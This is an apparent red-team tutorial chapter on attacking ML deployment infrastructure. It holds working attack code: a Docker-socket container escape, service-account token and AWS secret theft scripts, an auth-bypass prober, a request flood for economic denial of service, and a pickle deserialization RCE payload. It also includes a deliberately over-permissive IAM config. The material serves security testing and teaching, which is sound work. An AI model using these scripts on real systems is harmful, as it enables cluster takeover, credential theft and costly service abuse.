10.3.3 Deployment infrastructure attacks

2025.10.06.
AI Security Blog

Once a model survives the CI/CD pipeline and is pulled from a registry, it enters its operational environment. This deployment infrastructure—whether a sprawling Kubernetes cluster, a lean serverless function, or a dedicated virtual machine—becomes the new frontline. Attacking this layer isn’t about tricking the model’s logic; it’s about dismantling the foundation it stands on, gaining control of its execution, and exploiting the trust placed in its operational context.

Your goal as a red teamer is to treat the deployed model not as the target itself, but as a potential foothold into the production environment. A compromised inference endpoint can become a pivot point to exfiltrate data, poison other systems, or disrupt the entire MLOps lifecycle.

Compromising Containerized ML Environments

Kubernetes has become the de facto standard for orchestrating ML workloads, but its complexity creates a rich attack surface. A single misconfiguration in a pod definition or a network policy can unravel the security of the entire cluster.

Privilege Escalation via Insecure Pod Configurations

Developers often grant excessive permissions to pods for debugging or simplicity, creating dangerous backdoors. Look for pods running with `privileged: true` or with sensitive host volumes mounted using `hostPath`. A compromised inference container with a `hostPath` mount to `/` or `/var/run/docker.sock` effectively gives you root on the underlying node.
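You can enumerate these misconfigurations quickly by querying the API server. Below is a minimal sketch using the official `kubernetes` Python client; it assumes you hold a kubeconfig, or run it in-cluster with a token that can list pods.

# Minimal sketch: flag pods with privileged containers or sensitive
# hostPath mounts. Assumes the `kubernetes` Python client and permission
# to list pods across namespaces.
from kubernetes import client, config

SENSITIVE_PATHS = {"/", "/var/run/docker.sock", "/etc", "/root"}

config.load_kube_config()  # or config.load_incluster_config() inside a pod
v1 = client.CoreV1Api()

for pod in v1.list_pod_for_all_namespaces().items:
    findings = []
    for c in pod.spec.containers:
        sc = c.security_context
        if sc and sc.privileged:
            findings.append(f"privileged container: {c.name}")
    for vol in pod.spec.volumes or []:
        if vol.host_path and vol.host_path.path in SENSITIVE_PATHS:
            findings.append(f"hostPath mount: {vol.host_path.path}")
    if findings:
        print(f"{pod.metadata.namespace}/{pod.metadata.name}: "
              f"{', '.join(findings)}")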

A common attack vector involves finding a remote code execution (RCE) vulnerability in the model’s serving framework (like Flask or FastAPI) and then using the pod’s overprivileged configuration to escape the container.

[Figure: Kubernetes pivot attack from a compromised inference pod. (1) The attacker gains RCE through the vulnerable inference API; (2) escapes the container via the mounted Docker socket (`hostPath: /var/run/docker.sock`); (3) steals the service account token and node credentials, reaching the kubelet and other pods on the worker node.]
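Step 2 of the diagram is worth spelling out. With RCE in a pod that mounts the Docker socket, the escape is almost a one-liner: ask the host's Docker daemon to start a fresh container with the node's root filesystem bind-mounted. A minimal sketch using the `docker` Python SDK follows; the target file path is illustrative.

# Minimal sketch: escape via a mounted Docker socket by asking the host
# daemon to run a container with the node's root filesystem bind-mounted.
# Assumes the `docker` SDK is available in the compromised pod.
import docker

d = docker.DockerClient(base_url="unix://var/run/docker.sock")

# Any command run here reads the node's filesystem as root; the kubelet
# config path is a common (kubeadm) example, not guaranteed to exist.
output = d.containers.run(
    "alpine",
    command="cat /host/etc/kubernetes/kubelet.conf",
    volumes={"/": {"bind": "/host", "mode": "ro"}},
    remove=True,
)
print(output.decode())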

Service Account Token Theft and Abuse

Every Kubernetes pod runs under a service account, and by default its token is automatically mounted inside the container at `/var/run/secrets/kubernetes.io/serviceaccount/token`. If that service account has excessive permissions (e.g., `cluster-admin`, or the ability to list secrets in all namespaces), an attacker with RCE in the pod can use the token with `kubectl` or direct API calls to pivot and compromise the entire cluster. Always check the permissions bound to the service accounts of your inference pods.
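Checking this from inside a compromised pod takes only a few lines: read the mounted token and probe the API server directly. A minimal sketch using only `requests`:

# Minimal sketch: probe the Kubernetes API with the pod's own service
# account token. Run from inside a compromised pod; assumes `requests`.
import requests

SA_DIR = "/var/run/secrets/kubernetes.io/serviceaccount"
token = open(f"{SA_DIR}/token").read()
namespace = open(f"{SA_DIR}/namespace").read()

headers = {"Authorization": f"Bearer {token}"}
url = f"https://kubernetes.default.svc/api/v1/namespaces/{namespace}/secrets"

# A 200 here instead of 403 means the service account can read secrets.
r = requests.get(url, headers=headers, verify=f"{SA_DIR}/ca.crt")
print(r.status_code)
if r.ok:
    for item in r.json()["items"]:
        print("readable secret:", item["metadata"]["name"])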

Exploiting Serverless Deployment Flaws

Serverless functions (e.g., AWS Lambda, Google Cloud Functions) offer a seemingly secure, ephemeral environment. However, their security hinges entirely on the Identity and Access Management (IAM) roles they assume. A single overly permissive role can be a critical vulnerability.

Your primary target is the execution role. If an attacker can find a way to execute code within the function—perhaps through a dependency confusion vulnerability in a function layer or by exploiting a library used for data preprocessing—they inherit all permissions of that role.

# Example of a dangerously permissive serverless.yml for an AWS Lambda function
provider:
  name: aws
  runtime: python3.9
  iam:
    role:
      statements:
        - Effect: "Allow"
          # BAD: Wildcard permissions grant access to all S3 buckets
          Action: "s3:*" 
          Resource: "arn:aws:s3:::*" # Attacker can now read training data, other models, etc.
        - Effect: "Allow"
          # BAD: Grants access to read all secrets in Secrets Manager
          Action: "secretsmanager:GetSecretValue"
          Resource: "*" # Attacker can exfiltrate API keys, DB credentials

functions:
  predict:
    handler: handler.predict
    # ... function configuration

In the example above, a compromise of the `predict` function allows the attacker to read from any S3 bucket and retrieve any secret within the AWS account. This could include raw training data, other production models, or credentials for entirely different systems, turning a model compromise into a full-scale cloud environment breach.
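Demonstrating this blast radius during an engagement is straightforward: from inside the compromised function, `boto3` silently picks up the execution role's credentials, so no stolen keys are needed. A minimal sketch follows; the secret names are hypothetical guesses.

# Minimal sketch: enumerate what the Lambda execution role can reach.
# boto3 automatically assumes the function's role; no extra credentials.
import boto3

# With s3:* on arn:aws:s3:::*, every bucket in the account is listable
# and readable.
s3 = boto3.client("s3")
for bucket in s3.list_buckets()["Buckets"]:
    print("bucket:", bucket["Name"])

# GetSecretValue on "*" lets you pull any secret whose name you know or
# can guess; these IDs are hypothetical examples.
sm = boto3.client("secretsmanager")
for secret_id in ["prod/db-credentials", "ml/model-registry-token"]:
    try:
        value = sm.get_secret_value(SecretId=secret_id)["SecretString"]
        print("secret:", secret_id, "->", value)
    except sm.exceptions.ResourceNotFoundException:
        pass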

Subverting API Gateways and Model Endpoints

The API gateway is the public-facing door to your model. Attackers will probe it for weaknesses in authentication, authorization, and resource management before even attempting to interact with the model itself.

Authentication and Authorization Bypass

Test for classic web security flaws. Can you access an endpoint without a valid API key? Can a user-level key access administrative functions? Look for misconfigured routing rules where a path like `/v1/predict/internal` might bypass authentication checks applied only to `/v1/predict`.
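These checks are easy to automate: replay the same request against path variants and with the key stripped or downgraded, then diff the status codes. A minimal sketch, with illustrative URLs and header names:

# Minimal sketch: probe an inference API for authn/authz gaps by diffing
# responses across path variants and credential levels. URLs, header
# names, and payload are illustrative.
import requests

BASE = "https://api.example.com"
PATHS = ["/v1/predict", "/v1/predict/internal",
         "/v1//predict",  # double slash tests sloppy path normalization
         "/v1/admin/models"]
CREDS = {"no-key": {}, "user-key": {"x-api-key": "USER_LEVEL_KEY"}}

for path in PATHS:
    for label, headers in CREDS.items():
        r = requests.post(f"{BASE}{path}", json={"inputs": [1, 2, 3]},
                          headers=headers, timeout=10)
        # Anything other than 401/403 without a valid key needs a closer look.
        print(f"{path:<22} {label:<9} -> {r.status_code}")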

Economic Denial of Service (EDoS) via Resource Exhaustion

ML inference can be computationally expensive. If the API gateway has weak or non-existent rate limiting, you can launch an EDoS attack. By sending a high volume of legitimate inference requests, you can drive up cloud computing costs astronomically without ever triggering traditional DoS protections. This is especially effective against models that run on expensive GPU instances. Your test is simple: script a loop to call the endpoint and observe the billing dashboard.
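A minimal sketch of that test, using a thread pool to sustain concurrency; the endpoint and payload are illustrative, and the volume should stay within your rules of engagement.

# Minimal sketch: sustain a high volume of *valid* inference requests to
# measure cost and scaling behavior. Only run against systems you are
# authorized to test.
import time
from concurrent.futures import ThreadPoolExecutor

import requests

URL = "https://api.example.com/v1/predict"
HEADERS = {"x-api-key": "VALID_KEY"}
PAYLOAD = {"inputs": "a maximally expensive prompt or oversized input"}

def hit(_):
    start = time.time()
    r = requests.post(URL, json=PAYLOAD, headers=HEADERS, timeout=30)
    return r.status_code, time.time() - start

with ThreadPoolExecutor(max_workers=50) as pool:
    for status, latency in pool.map(hit, range(1000)):
        # Rising latency with no 429s suggests rate limiting is absent and
        # the provider is absorbing the load as billable autoscaled capacity.
        print(status, f"{latency:.2f}s")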

Red Team TTPs for Infrastructure Validation

Systematically testing the deployment infrastructure requires a combination of cloud configuration review and active exploitation. The following table outlines key tactics.

| Target Component | Common Vulnerability | Red Team Tactic | Impact on ML System |
|---|---|---|---|
| Kubernetes pod | Privileged container or sensitive `hostPath` mount | Gain RCE in the container, then use mounted sockets or host access to escape to the node. | Full control over the inference node; ability to intercept or modify model inputs/outputs for all pods on the node. |
| Kubernetes service account | Overly permissive RBAC role binding | Steal the service account token from within a compromised pod; use `kubectl` with the token to enumerate and access cluster resources. | Exfiltrate other models, training data, and secrets, or deploy malicious pods into the cluster. |
| Serverless function | Wildcard IAM permissions (e.g., `s3:*`) | Exploit a code injection or dependency flaw to run AWS API calls under the function's assumed role. | Exfiltrate the entire training dataset, steal model artifacts, or access other sensitive cloud resources. |
| API gateway | Missing or misconfigured rate limiting | Automate a high volume of valid requests to the inference endpoint. | Massive cost overruns (economic DoS); degraded service for legitimate users. |
| Model serving framework | Insecure deserialization (e.g., pickle) | Craft a malicious input file that executes arbitrary code when deserialized by the model loader. | Initial code execution within the container/VM, opening the door to the infrastructure attacks above. |
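The last row deserves a concrete illustration, since it is often the initial foothold for everything above. Python's pickle format executes code at load time via `__reduce__`, so any model loader that calls `pickle.load()` on attacker-supplied files (and, in older versions, `torch.load()` with its default settings) is exploitable. A minimal, deliberately harmless sketch:

# Minimal sketch: a pickle payload that executes code when deserialized.
# The command here is harmless; in a real attack it would be a reverse
# shell or credential-stealing stager.
import pickle

class MaliciousModel:
    def __reduce__(self):
        import os
        return (os.system, ("id > /tmp/pwned",))

payload = pickle.dumps(MaliciousModel())

# What a naive model loader does -- this line runs the embedded command:
pickle.loads(payload)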